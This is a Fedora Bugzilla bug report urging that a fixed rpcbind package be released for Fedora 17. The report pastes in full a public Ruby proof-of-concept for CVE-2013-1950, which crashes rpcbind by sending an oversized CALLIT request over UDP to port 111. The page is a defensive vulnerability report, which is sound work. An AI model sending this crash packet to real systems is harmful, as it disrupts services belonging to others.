Bug 985254 - rpcbind exploit made public for 0.2.0-19 - push 0.2.0-20 to fc 17 stable
rpcbind exploit made public for 0.2.0-19 - push 0.2.0-20 to fc 17 stable
Status: CLOSED DUPLICATE of bug 955211
Product: Fedora
Classification: Fedora
Component: rpcbind (Show other bugs)
17
All Linux
unspecified Severity urgent
: ---
: ---
Assigned To: Steve Dickson
Fedora Extras Quality Assurance
http://packetstormsecurity.com/files/...
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2013-07-17 04:03 EDT by customercare
Modified: 2013-07-17 04:12 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2013-07-17 04:12:13 EDT
Type: Bug
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description customercare 2013-07-17 04:03:26 EDT
#!/usr/bin/ruby
#
#   rpcbind_udp_crash_poc.rb
#   07/15/2013
#   Sean Verity <veritysr1980 [at] gmail.com>
#   CVE 2013-1950
#
#   rpcbind (CALLIT Procedure) UDP Crash PoC
#   Affected Software Package: rpcbind-0.2.0-19
#
#   Tested on:
#   Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP)
#   CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)
#
#   rpcbind can be crashed by setting the argument length
#   value > 8944 in an RPC CALLIT procedure request over UDP.
#
 
require 'socket'
 
def usage
    abort "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"
end
 
if ARGV.length == 1
    pkt = [rand(2**32)].pack('N')   # XID
    pkt << [0].pack('N')          # Message Type: CALL (0)
    pkt << [2].pack('N')          # RPC Version: 2
    pkt << [100000].pack('N')     # Program: Portmap (100000)
    pkt << [2].pack('N')          # Program Version: 2
    pkt << [5].pack('N')          # Procedure: CALLIT (5)
    pkt << [0].pack('N')          # Credentials Flavor: AUTH_NULL (0)
    pkt << [0].pack('N')          # Length: 0
    pkt << [0].pack('N')          # Credentials Verifier: AUTH_NULL (0)
    pkt << [0].pack('N')          # Length: 0
    pkt << [0].pack('N')          # Program: Unknown (0)
    pkt << [1].pack('N')          # Version: 1
    pkt << [1].pack('N')          # Procedure: 1
    pkt << [8945].pack('N')           # Argument Length
    pkt << "crash"                    # Arguments
 
    s = UDPSocket.new
    s.send(pkt, 0, ARGV[0], 111)
else
    usage
end
Comment 1 Tomas Hoger 2013-07-17 04:12:13 EDT

*** This bug has been marked as a duplicate of bug 955211 ***

Note You need to log in before you can comment on or make changes to this bug.